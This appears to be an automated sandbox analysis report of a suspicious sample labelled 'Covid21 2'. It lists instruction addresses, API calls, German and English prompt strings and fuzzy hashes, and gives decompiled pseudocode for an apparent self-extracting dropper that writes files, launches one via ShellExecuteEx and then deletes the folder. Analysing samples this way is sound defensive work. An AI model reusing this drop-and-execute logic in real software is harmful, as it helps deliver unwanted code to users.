                                  0x00401400
                                  0x00401400
                                  0x00401405
                                  0x00401413
                                  0x00401418
                                  0x0040141e
                                  0x0040141f
                                  0x00401451
                                  0x00401456
                                  0x00401458
                                  0x0040147a
                                  0x0040148b
                                  0x00401490
                                  0x0040145a
                                  0x0040145a
                                  0x0040145f
                                  0x00401464
                                  0x00401469
                                  0x0040146e
                                  0x00401473
                                  0x004014a5
                                  0x004014aa
                                  0x004014ac
                                  0x004014ae
                                  0x004014b3
                                  0x004014b8
                                  0x004014bd
                                  0x004014c2
                                  0x004014c7
                                  0x004014c7
                                  0x004014d7
                                  0x004014dc
                                  0x004014de
                                  0x004014e0
                                  0x004014e5
                                  0x004014ea
                                  0x004014ef
                                  0x004014f4
                                  0x004014f9
                                  0x004014f9
                                  0x00401509
                                  0x0040150e
                                  0x00401510
                                  0x0040176d
                                  0x0040176d
                                  0x00401772
                                  0x00401780
                                  0x0040178b
                                  0x0040178c
                                  0x00401791
                                  0x00401796
                                  0x004017a4
                                  0x004017af
                                  0x004017b0
                                  0x004017c0
                                  0x004017c5
                                  0x004017c7
                                  0x00401a3c
                                  0x00401a3c
                                  0x00401a42
                                  0x00401a48
                                  0x00401a52
                                  0x00401a57
                                  0x00401a5d
                                  0x00401a62
                                  0x00401a68
                                  0x00401a69
                                  0x00401a6e
                                  0x00401a79
                                  0x00401a7e
                                  0x00401a80
                                  0x00401aa4
                                  0x00401aa9
                                  0x00401aae
                                  0x00401abf
                                  0x00401ac4
                                  0x00401aca
                                  0x00401ad2
                                  0x00401a82
                                  0x00401a8d
                                  0x00401a97
                                  0x00401adc
                                  0x00401ae2
                                  0x00401ae2
                                  0x00401ae4
                                  0x00401ae9
                                  0x00401aeb
                                  0x00401af1
                                  0x00401af1
                                  0x00401af6
                                  0x00401afc
                                  0x00401b02
                                  0x00401b08
                                  0x00401b0d
                                  0x00401b13
                                  0x00401b18
                                  0x00401b1e
                                  0x00401b24
                                  0x00401b2a
                                  0x00401b30
                                  0x00401b34
                                  0x00401b39
                                  0x00401b3f
                                  0x00401b4a
                                  0x00401b54
                                  0x00401b56
                                  0x00401b63
                                  0x00401b68
                                  0x00401b6e
                                  0x00401b74
                                  0x00401b77
                                  0x00401b7c
                                  0x00401b82
                                  0x00401b88
                                  0x00401b8b
                                  0x00401b90
                                  0x00401b96
                                  0x00401b9c
                                  0x00401ba4
                                  0x00401ba4
                                  0x004017cd
                                  0x004017cd
                                  0x004017d2
                                  0x004017d9
                                  0x004017de
                                  0x004017e4
                                  0x004017f7
                                  0x004017fc
                                  0x004017fd
                                  0x004017fe
                                  0x00401804
                                  0x0040180a
                                  0x00401810
                                  0x00401815
                                  0x00401829
                                  0x00401829
                                  0x00401829
                                  0x00401817
                                  0x00401817
                                  0x0040181d
                                  0x00401820
                                  0x00000000
                                  0x00401822
                                  0x00401822
                                  0x00401822
                                  0x00401820
                                  0x0040182b
                                  0x0040182d
                                  0x00000000
                                  0x00401833
                                  0x00401833
                                  0x0040183a
                                  0x00401841
                                  0x00401846
                                  0x00401852
                                  0x00401858
                                  0x0040185c
                                  0x00401867
                                  0x00401868
                                  0x0040186d
                                  0x00401873
                                  0x00401873
                                  0x00401875
                                  0x0040187a
                                  0x004019dd
                                  0x004019dd
                                  0x004019e4
                                  0x004019f1
                                  0x004019f6
                                  0x004019fc
                                  0x00401a02
                                  0x00401a05
                                  0x00401a0a
                                  0x00401a10
                                  0x00401a16
                                  0x00401a19
                                  0x00401a1e
                                  0x00401a24
                                  0x00401a2a
                                  0x00401a32
                                  0x00401880
                                  0x00401880
                                  0x00401886
                                  0x0040188c
                                  0x00401897
                                  0x00401898
                                  0x0040189d
                                  0x004018a3
                                  0x004018a3
                                  0x004018a5
                                  0x004018aa
                                  0x004018ac
                                  0x004018b2
                                  0x004018b2
                                  0x004018c7
                                  0x004018c9
                                  0x004019af
                                  0x004019af
                                  0x004019bf
                                  0x004019c1
                                  0x004019ce
                                  0x004019d8
                                  0x004019d8
                                  0x00000000
                                  0x004018cf
                                  0x004018d4
                                  0x004018d9
                                  0x004018e4
                                  0x004018f0
                                  0x004018fa
                                  0x004018ff
                                  0x00401905
                                  0x0040190f
                                  0x00401914
                                  0x0040191a
                                  0x0040191f
                                  0x0040192b
                                  0x00401931
                                  0x00401935
                                  0x0040193a
                                  0x00401940
                                  0x00401945
                                  0x0040194b
                                  0x0040194e
                                  0x00000000
                                  0x00401950
                                  0x00401950
                                  0x00401957
                                  0x00401964
                                  0x00401969
                                  0x0040196f
                                  0x00401975
                                  0x00401978
                                  0x0040197d
                                  0x00401983
                                  0x00401989
                                  0x0040198c
                                  0x00401991
                                  0x00401997
                                  0x0040199d
                                  0x004019a5
                                  0x004019a5
                                  0x0040194e
                                  0x004018c9
                                  0x0040187a
                                  0x0040182d
                                  0x00401516
                                  0x0040153a
                                  0x0040155e
                                  0x00401586
                                  0x004015a9
                                  0x004015bd
                                  0x004015c7
                                  0x004015cc
                                  0x004015d1
                                  0x004015d7
                                  0x004015da
                                  0x00000000
                                  0x00000000
                                  0x004015fe
                                  0x00401601
                                  0x00401647
                                  0x0040164a
                                  0x00000000
                                  0x0040164c
                                  0x00401651
                                  0x00401657
                                  0x0040165a
                                  0x00000000
                                  0x0040165c
                                  0x0040165c
                                  0x00401668
                                  0x00401673
                                  0x00401674
                                  0x0040167e
                                  0x00401683
                                  0x00000000
                                  0x00401683
                                  0x0040165a
                                  0x00401603
                                  0x00401608
                                  0x0040160e
                                  0x00401611
                                  0x00401689
                                  0x00000000
                                  0x00401613
                                  0x00401613
                                  0x0040161f
                                  0x0040162a
                                  0x0040162b
                                  0x00401635
                                  0x0040163a
                                  0x0040168f
                                  0x0040168f
                                  0x00401694
                                  0x0040169c
                                  0x004016a2
                                  0x004016a8
                                  0x004016ad
                                  0x004016b3
                                  0x004016c6
                                  0x004016cb
                                  0x004016cc
                                  0x004016cd
                                  0x004016d3
                                  0x004016d9
                                  0x004016df
                                  0x004016e4
                                  0x0040171f
                                  0x00401724
                                  0x00401726
                                  0x00401728
                                  0x0040172d
                                  0x0040172d
                                  0x00401732
                                  0x00401738
                                  0x0040173e
                                  0x00401744
                                  0x0040174a
                                  0x00401750
                                  0x00401756
                                  0x0040175c
                                  0x00401762
                                  0x00401768
                                  0x00000000
                                  0x004016e6
                                  0x004016e6
                                  0x004016f7
                                  0x004016fc
                                  0x00401702
                                  0x0040170a
                                  0x0040170a
                                  0x004016e4
                                  0x00401611
                                  0x00000000
                                  0x00401601
                                  0x004015dc
                                  0x004015e2
                                  0x004015ea
                                  0x004015ea
                                  0x00401510
                                  0x00401458
                                  0x004013fe
                                  0x004012db
                                  0x004012db
                                  0x004012ec
                                  0x00401bb6
                                  0x00401bb6
                                  0x00401bbb
                                  0x00401bbb
                                  0x00401bc6
                                  0x00401bcb
                                  0x00401bd0
                                  0x00401bda
                                  0x00401bdf
                                  0x00401be4
                                  0x00401bf3

                                  APIs
                                  • memset.MSVCRT ref: 0040100F
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 0040101C
                                  • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                    • Part of subcall function 00407470: HeapCreate.KERNELBASE(00000001,00001000,00000000,?,00401049,00000000,00001000,00000000,00000000), ref: 0040747C
                                    • Part of subcall function 00407470: RtlAllocateHeap.NTDLL(029A0000,00000001,00004104), ref: 004074AA
                                    • Part of subcall function 00406807: HeapCreate.KERNELBASE(00000000,00000400,00000000,0040104E,00000000,00001000,00000000,00000000), ref: 00406810
                                    • Part of subcall function 00404AB3: LoadIconA.USER32(00000001,00000058), ref: 00404AE1
                                    • Part of subcall function 00404AB3: LoadCursorA.USER32(00000000,00007F00), ref: 00404AF3
                                    • Part of subcall function 004040E0: RtlInitializeCriticalSection.NTDLL(0040B454), ref: 004040EA
                                    • Part of subcall function 004040E0: GetStockObject.GDI32(00000011), ref: 004040F2
                                    • Part of subcall function 004040E0: memset.MSVCRT ref: 0040412E
                                    • Part of subcall function 00403D90: HeapCreate.KERNELBASE(00000000,00001000,00000000,00401062,00000000,00001000,00000000,00000000), ref: 00403D99
                                    • Part of subcall function 0040393B: RtlInitializeCriticalSection.NTDLL(0040B400), ref: 00403950
                                    • Part of subcall function 00403694: 6FA4DB20.COMCTL32(0040106C,00000000,00001000,00000000,00000000), ref: 00403694
                                    • Part of subcall function 00403694: CoInitialize.OLE32(00000000), ref: 0040369B
                                    • Part of subcall function 00403EF0: RtlAllocateHeap.NTDLL(00000000,0000002C), ref: 00403EFD
                                    • Part of subcall function 00403060: HeapFree.KERNEL32(00000000,?,?,027D12B8,00000000,004010A6,0040A37C,0040B1F4,00000007,00000008,00000000,0040A384,00000007,00000000,00001000,00000000), ref: 00403091
                                    • Part of subcall function 004030A0: RtlAllocateHeap.NTDLL(00000008,-00000018,00000401), ref: 004030B5
                                    • Part of subcall function 00403DC0: RtlAllocateHeap.NTDLL(00D40000,00000008,00000000), ref: 00403DD1
                                  • GetUserDefaultLangID.KERNEL32(00000008,00000400,00000008,0040A37C,0040B1F4,00000007,00000008,00000000,0040A384,00000007,00000000,00001000,00000000,00000000), ref: 004010CF
                                  • VerLanguageNameA.KERNEL32(00000000,00000008,00000400,00000008,0040A37C,0040B1F4,00000007,00000008,00000000,0040A384,00000007,00000000,00001000,00000000,00000000), ref: 004010D5
                                  • CharLowerA.USER32(00000000,00000008,00000400,00000008,0040A37C,0040B1F4,00000007,00000008,00000000,0040A384,00000007,00000000,00001000,00000000,00000000), ref: 004010E0
                                    • Part of subcall function 00403E30: HeapFree.KERNEL32(00D40000,00000000,00000000,00401113,00000000,00000000), ref: 00403E3E
                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000), ref: 00401311
                                    • Part of subcall function 00403A18: strncpy.MSVCRT ref: 00403A53
                                    • Part of subcall function 004074F0: strlen.MSVCRT ref: 00407503
                                    • Part of subcall function 004036A2: MessageBoxA.USER32(00000000,00000010,00000000,?), ref: 004036BC
                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BBB
                                  • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BC6
                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BCB
                                  Strings
                                  • Fortfahren?, xrefs: 0040112A
                                  • Password, xrefs: 004012AF
                                  • 2, xrefs: 004012D6
                                  • Bitte geben Sie das Passwort ein., xrefs: 004011EA
                                  • "*, xrefs: 00401383
                                  • Can not create some of your include files., xrefs: 0040121F
                                  • Fehler!, xrefs: 0040113A
                                  • Can not allocate the memory., xrefs: 0040122F
                                  • The file , xrefs: 0040125F
                                  • already exists in the current directory. Overwrite?, xrefs: 0040126F
                                  • An unknown error occured. The program will be terminated., xrefs: 0040127F
                                  • Choose a location to save the files., xrefs: 0040129F
                                  • This program is not supported on this operating system., xrefs: 0040128F
                                  • deutsch, xrefs: 00401119
                                  • Falsches Passwort., xrefs: 0040116A
                                  • Bitte whlen Sie einen Ordner zum Speichern der Dateien aus., xrefs: 004011CA
                                  • Continue?, xrefs: 004011FF
                                  • Overwrite?, xrefs: 0040124F
                                  • Wrong password., xrefs: 0040123F
                                  • Einige Include Dateien konnten nicht erstellt werden., xrefs: 0040114A
                                  • Please enter the password., xrefs: 004012BF
                                  • Die Datei , xrefs: 0040118A
                                  • \BDFINOPS, xrefs: 00401A4D
                                  • Error!, xrefs: 0040120F
                                  • Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet., xrefs: 004011AA
                                  • Passwort, xrefs: 004011DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateCreate$Initialize$CriticalExitFreeHandleLoadModuleProcessSectionmemset$CharCursorDefaultDestroyIconLangLanguageLowerMessageNameObjectStockUserstrlenstrncpy
                                  • String ID: "*$ already exists in the current directory. Overwrite?$2$An unknown error occured. The program will be terminated.$Bitte geben Sie das Passwort ein.$Bitte whlen Sie einen Ordner zum Speichern der Dateien aus.$Can not allocate the memory.$Can not create some of your include files.$Choose a location to save the files.$Continue?$Die Datei $Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet.$Einige Include Dateien konnten nicht erstellt werden.$Error!$Falsches Passwort.$Fehler!$Fortfahren?$Overwrite?$Password$Passwort$Please enter the password.$The file $This program is not supported on this operating system.$Wrong password.$\BDFINOPS$deutsch
                                  • API String ID: 602452764-4079455548
                                  • Opcode ID: e84a9e40abeb1d00b33dfa4709f4ce2b70badb24024655d8a4711a76d8606b70
                                  • Instruction ID: 3783c48d9a695ad555a110271d4ece50a90aebaed67b6da37d86febcd6e90675
                                  • Opcode Fuzzy Hash: e84a9e40abeb1d00b33dfa4709f4ce2b70badb24024655d8a4711a76d8606b70
                                  • Instruction Fuzzy Hash: CE423C71250201EBD700BF62EE62E693B65EB48749F50403BF9007E2F2CB7D5951AB9E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402779, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 362 402779-40277b 363 402780-40278b 362->363 363->363 364 40278d-4027f6 call 403100 * 3 ShellExecuteEx 363->364 371 4027fa-402817 Sleep GetExitCodeProcess 364->371 372 402827 371->372 373 402819-402823 371->373 372->371 373->372 374 402825-402851 call 407550 * 3 373->374
                                  C-Code - Quality: 95%
                                  			E00402779() {
				intOrPtr _t32;
				int _t34;
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;

				_t44 = 0x14;
				do {
					_t50 = _t50 - 4;
					 *_t50 = 0;
					_t44 = _t44 - 1;
				} while (_t44 != 0);
				E00403100(_t50,  *((intOrPtr*)(_t50 + 0x5c)));
				E00403100(_t50 + 4,  *((intOrPtr*)(_t50 + 0x60)));
				E00403100(_t50 + 8,  *((intOrPtr*)(_t50 + 0x64)));
				_t48 = _t50 + 0xc;
				 *_t48 = 0x3c;
				 *((intOrPtr*)(_t48 + 4)) = 0x140;
				 *((intOrPtr*)(_t48 + 0x1c)) = 0;
				 *(_t48 + 0xc) = "open";
				 *((intOrPtr*)(_t48 + 0x10)) =  *_t50;
				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t50 + 8));
				 *((intOrPtr*)(_t48 + 0x18)) =  *((intOrPtr*)(_t50 + 4));
				_t32 = _t50 + 0xc;
				_push(_t32); // executed
				L0040800B(); // executed
				 *((intOrPtr*)(_t50 + 0x48)) = _t32;
				while(1) {
					Sleep(0x19); // executed
					_t34 = GetExitCodeProcess( *(_t50 + 0x48), _t50 + 0x4c); // executed
					if(_t34 != 0 &&  *(_t50 + 0x4c) != 0x103) {
						break;
					}
				}
				return E00407550(E00407550(E00407550(1,  *_t50),  *((intOrPtr*)(_t50 + 4))),  *((intOrPtr*)(_t50 + 8)));
			}








                                  0x0040277b
                                  0x00402780
                                  0x00402780
                                  0x00402783
                                  0x0040278a
                                  0x0040278a
                                  0x00402794
                                  0x004027a1
                                  0x004027ae
                                  0x004027b7
                                  0x004027bb
                                  0x004027c2
                                  0x004027c9
                                  0x004027d5
                                  0x004027db
                                  0x004027e2
                                  0x004027e9
                                  0x004027ec
                                  0x004027f0
                                  0x004027f1
                                  0x004027f6
                                  0x004027fa
                                  0x004027ff
                                  0x00402810
                                  0x00402817
                                  0x00000000
                                  0x00000000
                                  0x00402827
                                  0x00402851

                                  APIs
                                  • ShellExecuteEx.SHELL32(?), ref: 004027F1
                                  • Sleep.KERNEL32(00000019), ref: 004027FF
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00402810
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: CodeExecuteExitProcessShellSleep
                                  • String ID: open
                                  • API String ID: 3887608683-2758837156
                                  • Opcode ID: df14b4278b00ed0d26c83213d7738cdcd665813f5d206012612cba75c38f70a4
                                  • Instruction ID: 008d11a2a8203ddc74c484c16875f5973d42d86a5d435cc8cf274525409f5c07
                                  • Opcode Fuzzy Hash: df14b4278b00ed0d26c83213d7738cdcd665813f5d206012612cba75c38f70a4
                                  • Instruction Fuzzy Hash: 0F213A71508309AFD700EF15C841A9FBBE4EF44308F10893EF49866290D779EA15DB86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406330, Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 389 406330-406343 390 406365-40636e 389->390 391 406345-406362 SetFilePointer 389->391 392 406370-40637d 390->392 393 4063de-4063e9 call 405f90 390->393 391->390 395 4063cb-4063db 392->395 396 40637f-406382 392->396 400 40640b-40642a memcpy 393->400 401 4063eb-406408 WriteFile 393->401 398 406384-406387 396->398 399 4063b6-4063c8 396->399 402 4063a3-4063b3 398->402 403 406389-4063a0 memcpy 398->403
                                  C-Code - Quality: 100%
                                  			E00406330(void** _a4, void* _a8, int _a12) {
				long _v4;
				void* _t34;
				void* _t42;
				void* _t51;
				void* _t57;
				void* _t59;
				int _t71;
				void** _t72;

				_t72 = _a4;
				_v4 = 0;
				if(_t72[5] == 1) {
					SetFilePointer( *_t72,  ~(_t72[3]), 0, 1); // executed
					_t72[5] = 0;
					_t72[3] = _t72[2];
				}
				_t51 = _t72[3];
				_t71 = _a12;
				if(_t51 <= _t71) {
					E00405F90(_t72);
					_t34 = _t72[2];
					if(_t71 < _t34) {
						memcpy(_t72[1] - _t72[3] + _t34, _a8, _t71);
						_t72[3] = _t72[3] - _t71;
						return _t71;
					} else {
						WriteFile( *_t72, _a8, _t71,  &_v4, 0); // executed
						return _v4;
					}
				} else {
					_t42 = _t72[2] + _t72[1] - _t51;
					_t57 = _t71 - 1;
					if(_t57 == 0) {
						 *_t42 =  *_a8;
						_t72[3] = _t72[3] - _t71;
						return _t71;
					} else {
						_t59 = _t57 - 1;
						if(_t59 == 0) {
							 *_t42 =  *_a8;
							_t72[3] = _t72[3] - _t71;
							return _t71;
						} else {
							if(_t59 == 2) {
								 *_t42 =  *_a8;
								_t72[3] = _t72[3] - _t71;
								return _t71;
							} else {
								memcpy(_t42, _a8, _t71);
								_t72[3] = _t72[3] - _t71;
								return _t71;
							}
						}
					}
				}
			}











                                  0x00406332
                                  0x0040633b
                                  0x00406343
                                  0x00406352
                                  0x0040635b
                                  0x00406362
                                  0x00406362
                                  0x00406365
                                  0x00406368
                                  0x0040636e
                                  0x004063df
                                  0x004063e4
                                  0x004063e9
                                  0x0040641a
                                  0x00406422
                                  0x0040642a
                                  0x004063eb
                                  0x004063fb
                                  0x00406408
                                  0x00406408
                                  0x00406370
                                  0x00406376
                                  0x0040637a
                                  0x0040637d
                                  0x004063d1
                                  0x004063d3
                                  0x004063db
                                  0x0040637f
                                  0x0040637f
                                  0x00406382
                                  0x004063bd
                                  0x004063c0
                                  0x004063c8
                                  0x00406384
                                  0x00406387
                                  0x004063a9
                                  0x004063ab
                                  0x004063b3
                                  0x00406389
                                  0x00406390
                                  0x00406398
                                  0x004063a0
                                  0x004063a0
                                  0x00406387
                                  0x00406382
                                  0x0040637d

                                  APIs
                                  • SetFilePointer.KERNELBASE(?,?,00000000,00000001,?,?,?,00406298,00000000,?,?,?,027D05A8,00000000), ref: 00406352
                                  • memcpy.MSVCRT ref: 00406390
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: FilePointermemcpy
                                  • String ID:
                                  • API String ID: 1104741977-0
                                  • Opcode ID: b49d06cf3595ba276dc545326d44b73e09d5a742b1af48970d0989ac99cef6b7
                                  • Instruction ID: 6313678625fda58dd2c5a9f412bfcc8c508d375f5e4440298ee736b1d6e11be6
                                  • Opcode Fuzzy Hash: b49d06cf3595ba276dc545326d44b73e09d5a742b1af48970d0989ac99cef6b7
                                  • Instruction Fuzzy Hash: 95316C763006009FC224DF2AD448E5BF7E9EFD4321F14C82EE69697B90C634E854CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004015F4, Relevance: 6.0, APIs: 4, Instructions: 25memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 404 4015f4 405 401689-40168a call 40505e 404->405 409 4015f9-401601 405->409 410 4015dc-4015ef _rmdir 405->410 412 401642-40164a 409->412 413 401603-401611 call 405066 409->413 411 401bbb-401bcb ExitProcess HeapDestroy ExitProcess 410->411 412->405 415 40164c-40165a call 405074 412->415 418 401613-40163d call 4045fc call 4030f0 call 404925 413->418 419 40163f-401640 413->419 422 401688 415->422 423 40165c-401686 call 4045fc call 4030f0 call 404925 415->423 435 40168f-4016e4 call 4031f0 call 406860 call 403de0 call 4074c0 418->435 419->405 422->405 423->435 444 401714-401726 call 4020c9 435->444 445 4016e6-40170f call 4036a2 _rmdir 435->445 450 401732-4017c7 call 401d57 call 403de0 call 4030f0 call 403de0 call 4030f0 call 4020c9 444->450 451 401728-40172d 444->451 445->411 464 401a3c-401a80 call 4074f0 * 3 call 4030f0 call 406170 450->464 465 4017cd-401815 call 403a18 call 403de0 call 4074c0 450->465 451->450 489 401a82-401ae9 call 406250 call 405fd0 call 4074c0 464->489 490 401a9e-401ad7 call 405ea0 call 40203d call 4036a2 _rmdir 464->490 478 401817-401820 465->478 479 401829 465->479 478->479 482 401822-401827 478->482 483 40182b-40182d 479->483 482->483 483->464 485 401833-40187a call 405dd5 call 4036f8 call 4030f0 call 4074c0 483->485 510 401880-4018aa call 4074f0 call 4030f0 call 4074c0 485->510 511 4019dd-401a37 call 403a79 call 405e15 call 405e90 _rmdir 485->511 512 401af6-401ba9 call 4074f0 * 2 call 402779 call 40203d call 405ea0 call 403a79 call 405e15 call 405e90 _rmdir 489->512 513 401aeb-401af1 call 402130 489->513 490->411 533 4018b7-4018c9 call 406230 510->533 534 4018ac-4018b2 call 402130 510->534 511->411 512->411 513->512 540 4019af-4019c1 call 406170 533->540 541 4018cf-40194e call 405fd0 call 4074f0 * 5 call 4036a2 533->541 534->533 540->511 551 4019c3-4019d8 call 406250 call 405fd0 540->551 541->540 570 401950-4019aa call 403a79 call 405e15 call 405e90 _rmdir 541->570 551->511 570->411
                                  C-Code - Quality: 76%
                                  			E004015F4(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _t11;
				intOrPtr _t15;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr* _t22;
				intOrPtr _t25;
				intOrPtr _t28;
				intOrPtr* _t31;
				intOrPtr* _t37;
				intOrPtr _t59;
				void* _t61;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr* _t69;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t77;
				intOrPtr _t78;
				void* _t80;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				void* _t101;
				intOrPtr _t104;
				intOrPtr _t108;
				intOrPtr _t116;
				intOrPtr _t117;
				intOrPtr _t121;
				intOrPtr _t125;
				void* _t130;
				void* _t131;
				void* _t133;
				void* _t134;
				intOrPtr _t135;
				intOrPtr _t137;
				void* _t138;
				intOrPtr _t139;
				intOrPtr _t140;
				intOrPtr _t141;
				intOrPtr _t142;
				intOrPtr _t143;
				intOrPtr _t144;
				void* _t145;
				intOrPtr _t147;
				void* _t148;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr _t151;
				intOrPtr _t152;
				void* _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				intOrPtr _t159;
				intOrPtr _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				void* _t163;
				void* _t164;
				void* _t165;
				intOrPtr* _t166;
				intOrPtr* _t167;

				_t165 = __esi;
				_t164 = __edi;
				while(1) {
					_push(E0040505E());
					if(0x10 ==  *_t166) {
						break;
					}
					__eflags = 0x332d -  *_t166;
					if(0x332d !=  *_t166) {
						__eflags = 0x332c -  *_t166;
						if(0x332c !=  *_t166) {
							continue;
						} else {
							_push(E00405074());
							__eflags = 3 -  *_t166;
							if(__eflags != 0) {
								continue;
							} else {
								_t11 =  *0x40b3f8; // 0x0
								E004045FC(__eflags, 2, _t11);
								_t130 = _t11;
								E004030F0(0x40b1dc, _t130);
								E00404925(_t164, __eflags, 0);
								_t167 = _t166 + 8;
								goto L12;
							}
						}
					} else {
						_push(E00405066());
						__eflags = 4 -  *_t166;
						if(__eflags != 0) {
							continue;
						} else {
							_t108 =  *0x40b3f8; // 0x0
							E004045FC(__eflags, 2, _t108);
							_t163 = _t108;
							E004030F0(0x40b1dc, _t163);
							E00404925(_t164, __eflags, 0);
							_t167 = _t166 + 8;
							L12:
							_t15 =  *0x40b3f8; // 0x0
							_push(_t15);
							_t16 = E004031F0( *0x40b1dc);
							_t17 =  *0x40b1dc; // 0x0
							E00406860(__eflags, _t17, _t16, _t15);
							 *0x40b3f8 =  *0x40b3f8 + 1;
							_t19 =  *0x40b3f8; // 0x0
							E00403DE0( *0x40b174,  *0x40b1b0);
							_t131 = _t19;
							_t121 = _t19;
							 *0x40b3f8 = _t121;
							_t122 = _t121 +  *0x40a38c;
							__eflags = _t131 +  *0x40a38c;
							E004074C0(_t121 +  *0x40a38c, _t131 +  *0x40a38c);
							if(__eflags != 0) {
								_t22 = E004020C9( *0x40b1b8, 0x40a0c9);
								__eflags = _t22;
								if(_t22 != 0) {
									_t104 =  *0x40b174; // 0x43e018
									 *0x40b1e0 = _t104;
								}
								_push( *0x40b15c);
								_push( *0x40b158);
								_push( *0x40b154);
								_push( *0x40b1e0);
								_push( *0x40b1d8);
								_push( *0x40b1d4);
								_push( *0x40b1d0);
								_push( *0x40b1dc);
								_push( *0x40b1b8);
								E00401D57();
								_t25 =  *0x40b3f8; // 0x0
								_push(_t25);
								E00403DE0( *0x40b148,  *0x40b154);
								_t133 = _t25;
								E004030F0(0x40b1e4, _t133);
								_t28 =  *0x40b3f8; // 0x0
								_push(_t28);
								E00403DE0( *0x40b14c,  *0x40b158);
								_t134 = _t28;
								E004030F0(0x40b1e8, _t134);
								_t31 = E004020C9( *0x40b1b8, "DFINOPS");
								__eflags = _t31;
								if(_t31 == 0) {
									L32:
									_t135 =  *0x40b170; // 0x29a4838
									_push( *0x40b3f8);
									E004074F0(_t135);
									E004074F0(0x40a0b9);
									_t137 =  *0x40b1cc; // 0x29a4f30
									E004074F0(_t137);
									_t122 = 0x40b1cc;
									_pop(_t138);
									E004030F0(0x40b1cc, _t138);
									_push( *0x40b1cc);
									_t37 = E00406170(__eflags, 1);
									__eflags = _t37;
									if(_t37 == 0) {
										E00405EA0( *0x40b1cc);
										E0040203D();
										_push(0x10);
										E004036A2( *0x40b180,  *0x40b19c);
										_push( *0x40b170);
										L00403196();
										_push(1);
									} else {
										E00406250(_t164, 1,  *0x40b1e4);
										E00405FD0(1);
										_t139 =  *0x40b1e8; // 0x29a4e60
										_t122 = 0;
										__eflags = 0;
										E004074C0(0, _t139);
										if(__eflags == 0) {
											_push( *0x40b1e8);
											E00402130();
										}
										_push( *0x40b3f8);
										_t140 =  *0x40b1c4; // 0x0
										_push( *0x40b3f8);
										E004074F0(_t140);
										_t141 =  *0x40b16c; // 0x0
										E004074F0(_t141);
										 *0x40b3f8 =  *0x40b3f8 + 1;
										_push( *0x40b168);
										_push( *0x40b1cc);
										_t142 =  *0x40a38c; // 0x29a06f0
										_v56 = _v56 + _t142;
										E00402779();
										_pop( *0x40b3f8);
										E0040203D();
